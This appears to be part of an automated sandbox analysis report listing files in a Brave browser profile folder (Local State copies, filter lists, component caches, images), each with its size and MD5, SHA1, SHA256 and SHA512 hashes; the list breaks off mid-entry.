dcbf0dfffaa05826eb940ec169abc78a14f1459f0b8dc1fb1dddb4da31cfd67d9b00f0e3b255a293da6b8bc2caa6e4776368c1c8fb3716b5b160efe855d12feb

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
9cb735bc360de5ee7ca908dab8264c7f

SHA1
c8931bdbaef0c154eb84285d9a570e54eed9c78b

SHA256
0e4a1e5f9f0724a9f2d99589cd1deeb9cb84ed6f946d93a0cc02bb2fed4177b3

SHA512
4bd8a6bd5fbc46d2a135a5f9b82d759536787f24b316b4ada7e749177639d693fb3eeb92d4fbfec34bc3867d2d8de78df6ba86438a42f6479e4e9c2ea6f4a201

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
64KB

MD5
e58c5c0187440f06e705964699875c4b

SHA1
99e788398bd310fcad165e25ca19b908a1990963

SHA256
6971ec6c6c0aff9314bb3dd7756edcd526334f0a7df4ce31d536c5ae4fbed80a

SHA512
a95687d2f9271e24a79a3d0ce6b0f7c18cee30489668f87ebc8ef41c5f0a3dcea178c2a40509d83400923736a3be0d96009ea52a4b70b8e057c6e5ffa108fea6

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
57KB

MD5
2e49ede1198779799a39d433e5f47c39

SHA1
42f0d871951505e5a73186ee86873954a5544084

SHA256
cb55fd87e1a69d2b79d1dfbfeea8edc016b43c29c3a1df8cc486dbfd5bbcaed3

SHA512
1ecf37947853a10a5874e0918e8340445c682bb823faff453c867ab83fc621199c3f064554832de111e82b5d21bb0b5fe03dd399a229f2fdf5f39369586c9a70

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
60KB

MD5
a7f3acd814260c2ed726e1edf2612e18

SHA1
b19132776a1482b17e5142e53390b847cfc0e354

SHA256
5de14f194a1f228540977b8f42fa5ed33ea5c962246ce8cb77a39b4a401ac432

SHA512
169bc88f27c2e590b8bac06b89b07c99502dd255cc46da259a8487904a120d982aa6c55a5bce64f7a9950ff53436f027959d2d23dc0801082a59cf795c327259

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
59KB

MD5
0bca2f999643fbb189ceb2079eb0d00f

SHA1
7b915360fa9559bcb313d8bb489cf1f9025767c4

SHA256
b4a2fac526e93840764e83c367c3d29dbae1c5b6d2e9aaa29cb517d9030cc4b6

SHA512
0b14a4280462459a204cb159cdc44b55fdd5fd3fb9675b60704e2e5009b72fd70fdd7f46654a0c78d41071f2dc415c1aa32b222615bcf4c82540114adf34e69c

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
54KB

MD5
a1895d3ce9a1f1dc3c219ce1218d83f9

SHA1
f09618f5456600e4d947dc51f94461be6f59fdd5

SHA256
873182faccc1f26cf9a6d4d9862837ac6e884f520c8211fe57b767461c3ede7a

SHA512
ab8f9762003166222ae89686c0004d0731e3e56a8b082ce4d598b13613638735b03276dc0dd30c8e6cc3f1c88b0104f32f5da623c650dee02d8b1365ce27ecc9

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
53KB

MD5
06ffe89fb7c49e768c6d8a7cd9d65efe

SHA1
6aafb106d9164721496baffde5546dc253842b17

SHA256
c13540d773d7d116fee202838a6f342e0960922f4b4ef1ffb23d6ea5ec04b0cd

SHA512
d6a4e8d6b77fef7b079cae55796dab273fbbd22ce398d479c5b7e5abf64f56d1bb920739196c4434c813e07d7875452c335beadd11d8a8e6dbf2fe82ffe07340

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
57KB

MD5
adf97f98bf885c65a2779aa52cb204db

SHA1
31853821b5c4b043f8b8767824a0255c5e79dc49

SHA256
8708f35c906ea202a9ee70dbc818424cef3fb56f84d04fac09837a4b81cad959

SHA512
8b67435c8ef833c84bf1b9453ace814a39cbe63ba1bab80c17eeb252f7d474ad24b7dcbd060e97fad0480ae57f15485004ce40214ea68da9eaac7cfe87f7a40b

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State

Filesize
54KB

MD5
dc4af85d18a5aa050b37ed514898f601

SHA1
ecbf944b07c9ddcb54d7a71c5a97c1b73ac9496c

SHA256
f8d8de794109cb02236f7326da826b3b16c28258b75b6a0d969ddc5666f7756c

SHA512
a754b06aa749a2a45cf275a2583110b46c9ea24c1c9e6a5d006360e33a51cc4268aeb3af443ce3be43f9f0184a2f5094ff9c9baff819a2e867dcf5f90498afbb

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State~RFe592503.TMP

Filesize
6KB

MD5
0e7c8e2693f98dc12fd1a1e51fb67eb8

SHA1
773397063ae6c508f1fa193ebed7b362515fa60a

SHA256
8eb4fadda000e079aa6e299d3af95bb77d133cdf84986fb5b8e9ff68f1fdf0b2

SHA512
a5d1d1094cdc99e6d00964637b10c58e4f3b1f4372f3bda644260f8b2bbf0105c82b21356e1ec4b18f99188a0f0f491764f84a3b576377760f42d83434b94549

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\PKIMetadata\1184\crs.pb

Filesize
141KB

MD5
57086b02f74c3fe7b79a5e2e3d852322

SHA1
6420387225ddcd5210175de4f3fdb0ab2be8ee9c

SHA256
a1b5be8d4aab349aff58ed34e1f3bc6647cf440830da0a12a8bd5a1c976c6407

SHA512
b195eb9a9129863e75be603b00b85ecfe46360910529fb38513af6940f9d17efd56f234b47963452329cd85b16bebb5a85ab5d304743e57d33bafd5b59900468

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\PKIMetadata\1184\ct_config.pb

Filesize
50KB

MD5
46b4d311088a1b5476ef5378009fb040

SHA1
5f4e068b959d6b52a46f4ce9bbca3149fd3178bd

SHA256
33f556efb669f0078999e06d42d3d29393a3909e6775f3fc2eb59e28588b6c14

SHA512
3f85d8f6eaea9c8d39df16a527b9d78faa67549af4c1e4ae59fa7bb6bc0acabfb35ad808cfe94fda07e60ffcff26e0c0b508f39e1aa6ecbf63dd9da845128400

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\SSLErrorAssistant\7\ssl_error_assistant.pb

Filesize
2KB

MD5
e2f792c9e2dd86f39e8286b2ead2fc70

SHA1
8a32867614d2a23e473ed642056ded8e566687f9

SHA256
ac354a4723aaa4f06bec385ddde4a4d0983ad51456f52b31a8068ec97d5b5ea7

SHA512
6a7af0ca1efa65a89a9ca3b8df0d2e24f21d91673c60cdfeeb02d33647442b01d535497249542f40e66e0d2dd3e9f8ed1f4a201fd97138d07a2b71366737e580

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\SafetyTips\3057\safety_tips.pb

Filesize
163KB

MD5
bd6846ffa7f4cf897b5323e4a5dcd551

SHA1
a6596cdc8de199492791faa39ce6096cf39295cd

SHA256
854b7eb22303ec3c920966732bc29f58140a82e1101dffe2702252af0f185666

SHA512
aa19b278f7211ffaf16b14b59d509ce6b80708e2bb5af87d98848747de4cba13b6626135dd3ec7aabd51b4c2cfb46ed96800a520d2dae8af8105054b6cd40e0b

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\TpcdMetadata\2025.1.5.1\metadata.pb

Filesize
33KB

MD5
0f83ea8aad2d94a32037e90f2812611d

SHA1
66a2879b881176df793c94f6833441fe153e5135

SHA256
628b2de57b5dde868a30e9c45ffc6ff35a820c93a90d3f4ff61a1ff5396eaf54

SHA512
e676aa774c099e43c00ecd42d2f10ae194910d9b694629abdba763aefc1d2c541cb1133ad3bf74df08fc6f8fb32b3f3047c07375977ee8d0f8bad9eddb7bc388

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\adcocjohghhfpidemphmcmlmhnfgikei\1.0.283\list.txt

Filesize
149KB

MD5
5f5455741ebf6bbb4293184c410b4414

SHA1
f97f61dab887a098bdb2ce5b2a5aef020f54e5c4

SHA256
2f0e8f3d3126a613fe37503fe314cec4553d7c47cb1d5dc32dbb4e2a10b4709c

SHA512
5629aa5b07690e73bf246555a8dab56bfbca07d62571048fad6a58a97fd93b09be93557b40667c92f3f6667530e1a0757b76d93812e0d11ee1972e0c690e9f5e

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal\1.0.1023\1\Greaselion.json

Filesize
3KB

MD5
7a611abbb6a9a924867db6020cb190d0

SHA1
e2f19e2ef273b9f5ae247873ce3306e774961d3d

SHA256
b080bd46957a74b2d321e701237222980c202f4139bc4c33056e8b8824f64402

SHA512
6646e87023a890e63c7c7aa6b006b41dddfc7b9005a9d70fc114e45614e8bb652fcf4450f7bdf6326d31611d4d4c12f40cdd690313d56d6b214682d98a5ac898

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal\1.0.1023\1\clean-urls-permissions.json

Filesize
268B

MD5
00acb0f14b6b6c11ce80107110ead798

SHA1
2a40b0217ddea6d507234f236d3889b46ee35baa

SHA256
2e666bd0d92b08bddac4487b184c5612dc408f21fe4f3fab78a7ce1b2fa3f8ca

SHA512
c3a53397be2fcf41702524cb42c8d2b49d4cbde4c5479c6d0d6e92152cd213dd7436d7729906d76ed003d64e806cdf66dda7f3ca8dd4b9f9efabe25ffb76c2cc

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal\1.0.1023\1\clean-urls.json

Filesize
18KB

MD5
3e6714a16e04d03f205a85f2563eb1aa

SHA1
a76641cf3a4745ae2e4426fb10b73a6af4f1f272

SHA256
3c09ee2c055819d0ce5368cfcb19cd5384e2916d7a5c2332f59ed60b3545b0c0

SHA512
05062fd40cf019b7367c2cf65d2fd219fd4e602111e9bd20b76545dc890f20fc4d1ed798d630bc0821d52ef4c35bd83e63bb84971d10f162d4c6c12eda8526b0

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal\1.0.1023\1\debounce.json

Filesize
11KB

MD5
e0df2d0dc75d2deac9eebbe0ba8db9ab

SHA1
d0636e518045a34eb081096f86609744fa47ddab

SHA256
5f05b84687de1011614eb1ededfe23d6f98fb2be47ea1a04bae0c95d9a3113c2

SHA512
c086e251cac5c121b8841f0dbfd2a45af99991a8b4bf584727c6bbe7e1e52d2361d2ffeb099be5da937b17d3ea36882d7516ebb294b5f2ccd9959424c2a5a0e0

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal\1.0.1023\1\https-upgrade-exceptions-list.txt

Filesize
86KB

MD5
b8ebe8c70e14e1bdff4bf04cee9055a4

SHA1
6a8eeeb539eb5f630091a971585bc77731c24b12

SHA256
a9c464c1aa17ec9958141c020c30badddd4801e15b9c0a0d430859df0ad1955e

SHA512
9240b1d7ae17b6d20cb21a466335471d3b62ee2866e6d07dc62c1a288def513cedb5368891e4c8beecd135140a221bf8a16e048cced31b29fff9f8d0d40c7266

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal\1.0.1023\1\webcompat-exceptions.json

Filesize
6KB

MD5
54b1343eed0640cc4b415bd1ef50dba1

SHA1
df0a9d4bc264e7c9325a9d082ddb3ff8dea528ba

SHA256
9344abffe1529919decfc08c1f171600319625ef7ec9a6d63dfac4927d6246b4

SHA512
c7689d95879d890425e95322613167cb6be9c04f207e847fa3f6da4c752413325968a667fd3044d8cf08a74537a1affaffd02dfa33397079bdc603768f757e92

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\aoojcmojmmcbpfgoecoadbdpnagfchel\1.0.15\StudentNTP_Sam-Richter_x0825_WINNER.jpg

Filesize
544KB

MD5
f66e5fa138432af6b40849484545b809

SHA1
25942df987649a1bddda636686064d29dca799a6

SHA256
65b5f21ccdcbdb23f39baf036ae5eb3999f3e88e241bc57a3a4d1bf0fbfda605

SHA512
29a512f0f028b2c4e53f492f6a4fe27cc88b547334466341b08b70724b16e7eaaf70cb0308e251f404aa6b80db972a553438afc3894440e1b1ed0962ec7a5319

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\aoojcmojmmcbpfgoecoadbdpnagfchel\1.0.15\photo.json

Filesize
6KB

MD5
a7e80c8cc5121a2febc654140e53ac32

SHA1
c3b1b578dcbf91aa19e65d0ef6974c165723828e

SHA256
a2595174656b59176071c0b79b404efa7246a9242c2bd19545155194c6b8cf99

SHA512
d7ef1e8df49956bc212388ef7a5343b9836e825c4ff066aa65bf0f3a136ecee4b63ff807dd63eb33e6e812e470d644eccaf3a7f61a816e441ffc44a982690577

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\bfpgedeaaibpoidldhjcknekahbikncb\1.0.10530\list.txt

Filesize
54KB

MD5
8639567fa42a3059d9c6266c3ec2927e

SHA1
2903489fa80acdffeeebaea6a98ee410ad881e29

SHA256
d430aa7be279c195122a7054000e17155ab992456a999108939530885bc6c439

SHA512
391e00b701f707cae71ded5b9c5e21f159e61ba48f01fc9e355355c148d5fd2bf7383e8e90cfd890441e42f3f953126356957e3580fdc9dd61813830efc8e60f

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\cdbbhgbmjhfnhnmgeddbliobbofkgdhe\1.0.11694\list.txt

Filesize
1.4MB

MD5
c5f84ded62d8e85ae9c009c241a848d4

SHA1
230bc5c969d968dba052347f334f919c41f5152c

SHA256
a8f50bade9e23073d568249e98f45d33cbfeb67de2c7adffeb9b42256fd7b40a

SHA512
6bc4f698974c496ce58bb2ed1b86c138a8724402bb84d6975b72323429978a6c4143c33aaba9e00905440b0e3e219d2d0641d717d73d3db9ca5ec92c461c2b8c

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\adcocjohghhfpidemphmcmlmhnfgikei_af0c3b4e4f6e5a6d36a9e48d7fc2a6b897e9b489074c17d563f899ae06a3237d

Filesize
50KB

MD5
c585ab88774559f466e99ac16889b9f2

SHA1
e69ae7851e81b7ed095be003688e860db838c272

SHA256
af0c3b4e4f6e5a6d36a9e48d7fc2a6b897e9b489074c17d563f899ae06a3237d

SHA512
9405d7de2fe7f6a75fd786634bc8e1e2d3cb2ade1e82984e1369a8798900a8e5f28d1627ac09ad93e5e26e621ce1c2ef8bee7596ee832030d009e228b3eb8439

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\afalakplffnnnlkncjhbmahjfjhmlkal_c52f33bf7aa1779ed205f3542906b02ec0db39206cf088edf20884eb7416aea7

Filesize
71KB

MD5
722108b26ed18753274d6c51126432b7

SHA1
5e657f8eaaf661378df459e207c833c2aabd4418

SHA256
c52f33bf7aa1779ed205f3542906b02ec0db39206cf088edf20884eb7416aea7

SHA512
7b5318b10c03ffb8837b864e38603f0bb5f3c2364cf43e22b9fb5e33d48c67bf82db7b665952a70a1e3e3c66269129f4f756c85188229a18be144efee16e3497

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\aoojcmojmmcbpfgoecoadbdpnagfchel_9f86d8efba865ca6f98389b7c55e368191b7954cd10b872da84de0b5382a247a

Filesize
12.1MB

MD5
89c01a540e21a6012c4292eac6100dbb

SHA1
2bf600a9d372f38d37c64a9df5cb26d5cb046cf9

SHA256
9f86d8efba865ca6f98389b7c55e368191b7954cd10b872da84de0b5382a247a

SHA512
abd83f91b97c9c9bba4cb82501a6d316ef07173e4916e87a13f888ad32947b424d18bd6186a36245b2bd9f6c6cd29ccaaaf2445b3e5754c30ea53f1ab6016f25

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\bfpgedeaaibpoidldhjcknekahbikncb_758fe8cc398e0bba8bbd316593395b49cd8c88d4607d409945a09a9fff95eaf9

Filesize
18KB

MD5
ae5a26f2508bc460c8625d21818161f6

SHA1
019a1593f9ab34c9a4ed37c01a7dc0389f5e786b

SHA256
758fe8cc398e0bba8bbd316593395b49cd8c88d4607d409945a09a9fff95eaf9

SHA512
72a12e7a78b59e5219264498dc5b103d759fa5875b7dd4d536e873e262aa6bb5ac2f2e21d79e175d41a0eeaf800c7371e817afbe06177b3ef926206cbd311b1e

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\cdbbhgbmjhfnhnmgeddbliobbofkgdhe_765595839e1489d6f471573bb2069eac6876560bda056b75ed1be24c7daa1e81

Filesize
413KB

MD5
dbe4de8188a96cc3a53f4ff9c226bb4b

SHA1
fb3c506f942526e80d9d735cca18018d8612e01d

SHA256
765595839e1489d6f471573bb2069eac6876560bda056b75ed1be24c7daa1e81

SHA512
f4855141ca7fe65382cb1a1c8280d87a711f527897f6f0af879f0a2ad2de11b573c5d88d8b52194e5c2ec1323aa682653864ac90079c67360f0ebd0fb81e06fa

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\efniojlnjndmcbiieegkicadnoecjjef_1.9645143596dd859c7d9cc843cf13378660ea1b16e7689770d229142a0a3724c8

Filesize
150KB

MD5
e1900863188285f81af2e44329c5dfc3

SHA1
fc1234b818d73e3925c9e308644c39b7b0a1eae9

SHA256
9645143596dd859c7d9cc843cf13378660ea1b16e7689770d229142a0a3724c8

SHA512
be5c29c05ba5a79118e5b4d3223c27b50a00e89b429865267cc468a447fce91ec6e27fb5efef108e362a9d5722ef915cbf453199253b8b08560247be2566ebe0

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\gccbbckogglekeggclmmekihdgdpdgoe_233b931af6c91a3d29109b1778b31a5288f4a14405fa04896cf366e48fb4bdbf

Filesize
967KB

MD5
3484d692408c24f495595f4f93bb3592

SHA1
aab66c6e33d2d3f16f93a109c7d30f6fe942327d

SHA256
233b931af6c91a3d29109b1778b31a5288f4a14405fa04896cf366e48fb4bdbf

SHA512
4c5f74d7cd087b572e127fb8aaae4b433889af2f1f45561b24b59a1235db176d9c092f03b6dbcd01cd0ecc5e7b6037aad327c68f672d900df1c25fe6bc9d5058

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\ggkkehgbnfjpeggfpleeakpidbkibbmn_1.3525216abfc685f109e0efae397d7afe8bd1aec6d081fefc730947cd3e734f2f

Filesize
10KB

MD5
81c39099b5a4e221569eeec0a746af7b

SHA1
0601105a54e905370e965cbf8cf78bd6d8e300c2

SHA256
3525216abfc685f109e0efae397d7afe8bd1aec6d081fefc730947cd3e734f2f

SHA512
42011c20c52733df0116c4661efdce06d8ec70dd38cfae2cad45e4b4eb7cb24ab4061e968e4d5766e4203b8c4caaf2b6727e55bdf78402157a19eca0f2e89140

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\giekcmmlnklenlaomppkphknjmnnpneh_1.3eb16d6c28b502ac4cfee8f4a148df05f4d93229fa36a71db8b08d06329ff18a

Filesize
5KB

MD5
636c653ec2c30bb767533901a18669b2

SHA1
4b5a01cfea4c5deb62f3aafa01ef24265613b844

SHA256
3eb16d6c28b502ac4cfee8f4a148df05f4d93229fa36a71db8b08d06329ff18a

SHA512
a4128fb20a5df9e573e92b45f5bc18dcdf4be6e7e39172d08847882f17361320141e89b35deef337e40c365d6f1ccdd1b991eb4593d805dfa2e39a5257c335ee

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\gkboaolpopklhgplhaaiboijnklogmbc_9b0a6f79321f3960467e7d3e3b3e9817d3ef281c405da30852606bc8c9cc588f

Filesize
76KB

MD5
34f31f85a6b2a69a074939e4e231a047

SHA1
97f6d1a966baa94e686aef7fece23bbf099fb8c6

SHA256
9b0a6f79321f3960467e7d3e3b3e9817d3ef281c405da30852606bc8c9cc588f

SHA512
20f4d9efe5450e1f02608d382c97bd4269298c87763a4abcf63a5fe0ba62dd0c391824964084cc011ed6cd7db99c19c9b6411b04d42539081f3737dc78a2f2ed

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\heplpbhjcbmiibdlchlanmdenffpiibo_69d8f36372ec6edbfc4bdd957f954cc2aa97c9dc8c7992c1575b072632f3157f

Filesize
4KB

MD5
3a03f3ab4119a23fa6b70a32a6fcd4b0

SHA1
5d047a5da7c7f388416aa50b5fba745bf5f36eb8

SHA256
69d8f36372ec6edbfc4bdd957f954cc2aa97c9dc8c7992c1575b072632f3157f

SHA512
8caa4e94e831b25226e956a8ee87c5b369547081df863ee34e7f80d686259eb9b7bf75757043ecc5b0eda3a603198da060f9b6f30be755350ab912fdc7681819

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\hfnkpimlhhgieaddgfemjhofmfblmnib_1.08f4b0e8d3e8c509ab7367023c4c4d9e11d40a493fe21103faae7ccc0dac6506

Filesize
597KB

MD5
578ffc1fe873d95c6a78b80ae256c314

SHA1
4e8d7a8545bfe86fc8a43ddb8a44d47a08e7f539

SHA256
08f4b0e8d3e8c509ab7367023c4c4d9e11d40a493fe21103faae7ccc0dac6506

SHA512
efc17b828d495a94c9262f91908e42f1c59dd4ca73419d6362dc9132d4d307e237b2731d06b35adae41674fab19e9053f02037f627bca5ca1a167556945cc471

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\iblokdlgekdjophgeonmanpnjihcjkjj_44fdfde835126a128fd9f020a2d7c388491ab5d251a107e4e10b6f24b63e7d72

Filesize
17KB

MD5
a1b36d762732f9439efa78708a40dafb

SHA1
6533b78ae795077fa711c67347eabdc88b5a6c6b

SHA256
44fdfde835126a128fd9f020a2d7c388491ab5d251a107e4e10b6f24b63e7d72

SHA512
8dbfd514f87e7b929ab9d2b61f99939b3cf687947dff980ce3378b56127785acacde7b8fb4ff034e2a31f8cec1901605c6216b6846f5d2a199a245bf6144e05d

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\iodkpdagapdfkphljnddpjlldadblomo_ace2569360349db043092e45f66605fa9f8e1c14ce4b756fc15a38f451080a2c

Filesize
1.6MB

MD5
8b6d70183b98cc3f0daf427559e97555

SHA1
de38f1383710694af792124ca184855018ae045b

SHA256
ace2569360349db043092e45f66605fa9f8e1c14ce4b756fc15a38f451080a2c

SHA512
ec367bbe37dd31a0239ffe91e0e08c44dab648c211f553225903127fbb8d576c61414c2f9efe955360019eb81e5c654b5f73747f06abfaf86e82eed4f0d2c415

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\jamhcnnkihinmdlkakkaopbjbbcngflc_1.c52c62a7c50daf7d3f73ec16977cd4b0ea401710807d5dbe3850941dd1b73a70

Filesize
1.1MB

MD5
2ac309d48a054c8b1d9ea88bac4dbd6c

SHA1
7507922d88a9cb58759b5326fadae5d0c87f40b2

SHA256
c52c62a7c50daf7d3f73ec16977cd4b0ea401710807d5dbe3850941dd1b73a70

SHA512
870dbb86a67f36a43ad4c80db904e76b602bbe062cbb9fe4222d1cc69d99aa4a60aae91c094a65a481d8c62cca4942f178f1b2744ed21836a526c7ffe3409969

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\jflhchccmppkfebkiaminageehmchikm_1.823e6223d508b35c9ae7a2915bdb423ede93d67561dfa7004d883adbf96b13dd

Filesize
9KB

MD5
9b8deccfa481c95d142b4f82686a5720

SHA1
139e3152171bc002c739bcfdefcb98789ac8b9d0

SHA256
823e6223d508b35c9ae7a2915bdb423ede93d67561dfa7004d883adbf96b13dd

SHA512
8489129197a50923bb8b768676676fefef8ea2fd8e07a393151da1e998d914f851c3b4a34fcc7bc8f98a9fc24df7864d252ad59df5ba957a90c67e5e6ce40b0e

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\jflookgnkcckhobaglndicnbbgbonegd_1.e698359726dbebe13881db2d3d53856d8a3a1ffba048ac94773036cd08a60240

Filesize
77KB

MD5
1068b68cfdad67e39e13fb7b97adbdb6

SHA1
d3dac92d9c28b948ec33699ff69ae75a900de6cb

SHA256
e698359726dbebe13881db2d3d53856d8a3a1ffba048ac94773036cd08a60240

SHA512
da6c4d63d8d22e231d5101d93429a3ecc33c89d62b5fc969c7276816d79f8cbe45a16652507581480edb83b61f0e1c57f41e4432f6fdd67c878f38e0d4eef64d

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\khaoiebndkojlmppeemjhbpbandiljpe_1.44c97a8527ef50cab95a16c5e78cd321cbdf315726823afe7e0482af9eb18319

Filesize
5KB

MD5
93e97a6ae8c0cc4acaa5f960c7918511

SHA1
5d61c08dde1db8a4b27e113344edc17b2f89c415

SHA256
44c97a8527ef50cab95a16c5e78cd321cbdf315726823afe7e0482af9eb18319

SHA512
e61727a277d971467e850456fbc259dad77a331873e53e3e905605cd19b01c2dc46df7400ce8442e39cfac5ac3fbcd833ec7310c7ab1c3380d900dd676ed1679

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\mfddibmblmbccpadfndgakiopmmhebop_bdf60991017fe5e955ab0be306333b5427fac3db247bad1f24709d4c9c4b6ef3

Filesize
179KB

MD5
62af22ce07e0375e66db401f83384d5d

SHA1
468b255ebdfc24ff83db791823bca7e78b09f3b1

SHA256
bdf60991017fe5e955ab0be306333b5427fac3db247bad1f24709d4c9c4b6ef3

SHA512
54dd31001427a97665dad169b0d5f32fdb79a89eac7fa23a164bf78095be2d2e5f9195eb9ffedc2d1998f839781e32515baeae482ec74d8409b0d58fe53993e1

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\component_crx_cache\obedbbhbpmojnkanicioggnmelmoomoc_1.fa5d70ce715434cda9953be8a723c89384b00cf99e931dd43be46fa909f83371

Filesize
5.1MB

MD5
ba2dd3578e017160515508a271b9f664

SHA1
b5898eabc9b14b4d2b296a757ceb5468a7ec1e69

SHA256
fa5d70ce715434cda9953be8a723c89384b00cf99e931dd43be46fa909f83371

SHA512
5adbc5de11e3b153781e362c23464daf543970ea693f0ffe43dfa393de6cec13a54d74a82182db1263c59664722fb5ae979345a4bf50dceef8441544e0d11b79

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\gccbbckogglekeggclmmekihdgdpdgoe\1.0.1842\22c36fbe-bc7e-4032-9916-7714e2c2c1ed.jpg

Filesize
303KB

MD5
df861ed030b9f34f62a7e898ba5fdfa7

SHA1
75c3133fb148a02c788b0ec0803cce2a7ab4730c

SHA256
85a452059ea33cad9562ae320b99fdbd8cd6716cd462d5e9adaa00854dc2dcf5

SHA512
52b1392ba86142352dc835c17651303e8c0656814c2ba05050b54d5139bca8783301ceb69d92a5160e7b4441040c6baad53c8e529d412286cfb30ac2911a5266

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\gccbbckogglekeggclmmekihdgdpdgoe\1.0.1842\4bcf6459-9894-406c-90ef-45e91b6c49fd.png

Filesize
25KB

MD5
bbefdbd919e0d67c3455282a338696a6

SHA1
db750e44fe4ca7c9b18608f49fd3c17d0591bf50

SHA256
ac76de0292d251f4e07de7528c4b81c0c559cb387519d39958f901fc65cddcfd

SHA512
94922d21eb5e866bedf3d8877f40b2a410864a08bf98eb3a9dd3f3afffa3735f4d056e29dfc855e78fcdd89783269f265b9bc07d85e1289ed7a2d9e10630a127

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\gccbbckogglekeggclmmekihdgdpdgoe\1.0.1842\photo.json

Filesize
3KB

MD5
90a9e52ea33a561509a5910cd52d42ad

SHA1
578ef24ce665ee9dd3b8fe4afffad1bbca3cb068

SHA256
84b445611812e896363dabee5bce0181e02daa53f7a8f53c1207f04162fb9151

SHA512
386b1897e025c41200f581639044675d22c829d03cb6cc8fb5e779930159f54e94b4720451b66f37e7ca89060dff1e7d32fb0782316f782b7622b588a0724bfe

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\gkboaolpopklhgplhaaiboijnklogmbc\1.0.69\list_catalog.json

Filesize
76KB

MD5
d1d6a9d9cc2ada3f3bad8b0da607f4eb

SHA1
1d286de6436a8a28584744f022af73077ed64601

SHA256
f1a889c0f11e2642c299774f601b72b5cc51e86bb1fa7514cfa9f4fa1a9538ad

SHA512
4c43a10995b91d2791a8274813f005feab48d83078fb8b51f026266ff524ffbc53c41d507d801101a9a7f765453ab4b08398f4e743b6beb08036b72e40b82934

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\heplpbhjcbmiibdlchlanmdenffpiibo\1.0.11\mapping-table.json

Filesize
4KB

MD5
57ff689022f2d93d2287ac3b48daec73

SHA1
937b7dc21193a27607340af7fb7b987b8ea50582

SHA256
4665c8cb39b1fd0131b72097484bd3a8309992821a21de9ee0420434cc3f7d5c

